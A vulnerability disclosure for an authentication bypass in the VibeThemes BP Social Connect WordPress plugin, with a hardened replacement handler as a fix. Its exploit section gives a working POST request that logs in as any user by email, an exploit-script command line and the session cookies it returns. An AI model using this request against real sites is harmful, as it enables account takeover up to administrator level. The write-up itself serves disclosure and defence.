The plugin was affected by an Auth Bypass vulnerability. To bypass authentication, we only need to know the user’s email address. Depending on whose email address we know, we may even be given an administrator role on the website.


Let’s check the plugin

The bp_social_connect_facebook class adds the following action hook:

// Registered for unauthenticated (nopriv) AJAX requests, so anyone can reach the handler
add_action( 'wp_ajax_nopriv_bp_social_connect_facebook_login', array( $this, 'bp_social_connect_facebook_login' ) );

The bp_social_connect_facebook_login() method includes the following request handling:

// Every key in the POST body becomes a local variable ($email, $id, ...)
extract( $_POST );

PHP's extract() imports every key of $_POST into the local scope as a variable, so a request parameter named email becomes $email. Because the keys come from the client, the client decides which local variables exist and what they contain.

The function then tries to find the user by the Facebook user ID it received in the request, and if such a user exists, it logs that user in. It then tries to find the user by the email address it received in the request. If such a user exists, it logs that user in:

if ( email_exists( $email ) ) {
	// $email is whatever the client put in the POST body
	$user = $this->force_login( $email, false );
}

The function never verifies that the data actually came from Facebook: every value in the request is accepted as-is. So if we put a user's email address in the request, it immediately logs us in as that user without any further verification.
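The fix a plugin author would want is to stop trusting the request body for identity at all and let Facebook say who the token belongs to. The following is an added example of a hardened handler, not the plugin's own code. It assumes the page's Facebook JS SDK posts the access token it received as an access_token field, that the nonce is created with wp_create_nonce( 'bp_social_connect_nonce' ) (action name assumed), and that the Facebook ID is stored in the user meta key bp_social_connect_facebook_id (assumed). Only WordPress core functions and the public Graph API /me endpoint are used.

```php
<?php
// Added example (not the plugin's code): a hardened replacement for the login
// handler that accepts only identities confirmed by Facebook itself.
// Assumptions: the client posts `access_token`, the nonce action name is
// 'bp_social_connect_nonce', and the Facebook ID lives in user meta
// 'bp_social_connect_facebook_id'.

add_action( 'wp_ajax_nopriv_bp_social_connect_facebook_login', 'hardened_bp_social_connect_facebook_login' );

function hardened_bp_social_connect_facebook_login() {
	// 1. CSRF check. The nonce is visible to every visitor of the page, so it
	//    proves only that the request came from a page this site served; it
	//    is not authentication and must not be treated as such.
	$nonce = isset( $_POST['security'] ) ? sanitize_text_field( wp_unslash( $_POST['security'] ) ) : '';
	if ( ! wp_verify_nonce( $nonce, 'bp_social_connect_nonce' ) ) {
		wp_send_json_error( 'invalid nonce', 403 );
	}

	// 2. Read only the one field we need, explicitly. No extract(): the
	//    client must not be able to populate $email, $id or any other local.
	$token = isset( $_POST['access_token'] ) ? sanitize_text_field( wp_unslash( $_POST['access_token'] ) ) : '';
	if ( '' === $token ) {
		wp_send_json_error( 'missing token', 400 );
	}

	// 3. Ask Facebook who this token belongs to. The Graph API resolves /me
	//    against the token, so id and email come from Facebook's answer,
	//    never from the request body. add_query_arg expects pre-encoded values.
	$response = wp_remote_get(
		add_query_arg(
			array( 'fields' => 'id,email', 'access_token' => rawurlencode( $token ) ),
			'https://graph.facebook.com/me'
		),
		array( 'timeout' => 10 )
	);
	if ( is_wp_error( $response ) || 200 !== wp_remote_retrieve_response_code( $response ) ) {
		wp_send_json_error( 'token not accepted by Facebook', 401 );
	}
	$profile  = json_decode( wp_remote_retrieve_body( $response ), true );
	$fb_id    = isset( $profile['id'] ) ? (string) $profile['id'] : '';
	$fb_email = isset( $profile['email'] ) ? sanitize_email( $profile['email'] ) : '';
	if ( '' === $fb_id ) {
		wp_send_json_error( 'no profile for token', 401 );
	}

	// 4. Resolve the WordPress account: prefer the stored Facebook ID, and fall
	//    back only to the email address Facebook itself returned (it may be
	//    absent when the user did not grant the email permission).
	$users = get_users( array(
		'meta_key'   => 'bp_social_connect_facebook_id',
		'meta_value' => $fb_id,
		'number'     => 1,
	) );
	$user = $users ? $users[0] : ( $fb_email ? get_user_by( 'email', $fb_email ) : false );
	if ( ! $user ) {
		wp_send_json_error( 'no matching account', 404 );
	}

	// 5. Log in as the matched account. Roles are left exactly as stored;
	//    a social login must never elevate them.
	wp_set_current_user( $user->ID );
	wp_set_auth_cookie( $user->ID, false, is_ssl() );
	do_action( 'wp_login', $user->user_login, $user );
	wp_send_json_success( array( 'user' => $user->ID ) );
}
```

Two design choices matter here. First, the email address used for the lookup is the one in Facebook's response, so a client that knows a victim's email gains nothing by sending it. Second, each failure path ends in wp_send_json_error(), which calls wp_die(), so the handler cannot fall through to a login. A further hardening, not shown, is to confirm via the Graph API debug_token endpoint that the token was issued for this site's own app ID.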


Let’s see how we can exploit this vulnerability

We only need to send a POST request to exploit this vulnerability.

The HTTP request to https://lana.solutions/vdb/vibethemes-bp-social-connect/, a test WordPress website:

POST /vdb/vibethemes-bp-social-connect/ HTTP/1.1
Host: lana.solutions
Content-Type: application/x-www-form-urlencoded

action=bp_social_connect_facebook_login&security=f18e5cb1fa&email=vdb%40lana.codes&id=undefined

Note: The security value (the nonce) can be found in the page's HTML head as a hidden input element.


The exploit script

I created a Python script that returns the WordPress logged_in and auth cookies:

Source: vibethemes_bp_social_connect_plugin_vdb_get_exploit_cookie.py

How to use:

python3 vibethemes_bp_social_connect_plugin_vdb_get_exploit_cookie.py --website_url="https://lana.solutions/vdb/vibethemes-bp-social-connect/" --email="[email protected]"

We get something like this:

Response Cookies:

Name: wordpress_logged_in_9b4a50e46ed1050b69b1a8deb83c1965
Value: test%7C1685390027%7CUOOaA1cHvJdNFpHUjE6sBjfEh61w4nuRxOOETVEtwfQ%7C9e01a5ee073e124d9d6f17a23b840808a1edc00b871d9725c26362a7ef0446cb
Domain: lana.solutions
Path: /vdb/vibethemes-bp-social-connect/
Expires: None
Secure: True
HttpOnly: False

Name: wordpress_sec_9b4a50e46ed1050b69b1a8deb83c1965
Value: test%7C1685390027%7CUOOaA1cHvJdNFpHUjE6sBjfEh61w4nuRxOOETVEtwfQ%7C1424381517663a10919166571494d662f748573406acf325695a5e5f138275b8
Domain: lana.solutions
Path: /vdb/vibethemes-bp-social-connect/wp-admin
Expires: None
Secure: True
HttpOnly: False

Then all we have to do is set these cookies using the browser's Developer Tools on the website, which in our case is https://lana.solutions/vdb/vibethemes-bp-social-connect/


Try it

Feel free to try and use the lana.solutions/vdb WordPress websites for testing. I have set the roles and capabilities, so you can only get low-level access to the website.

Website: https://lana.solutions/vdb/vibethemes-bp-social-connect/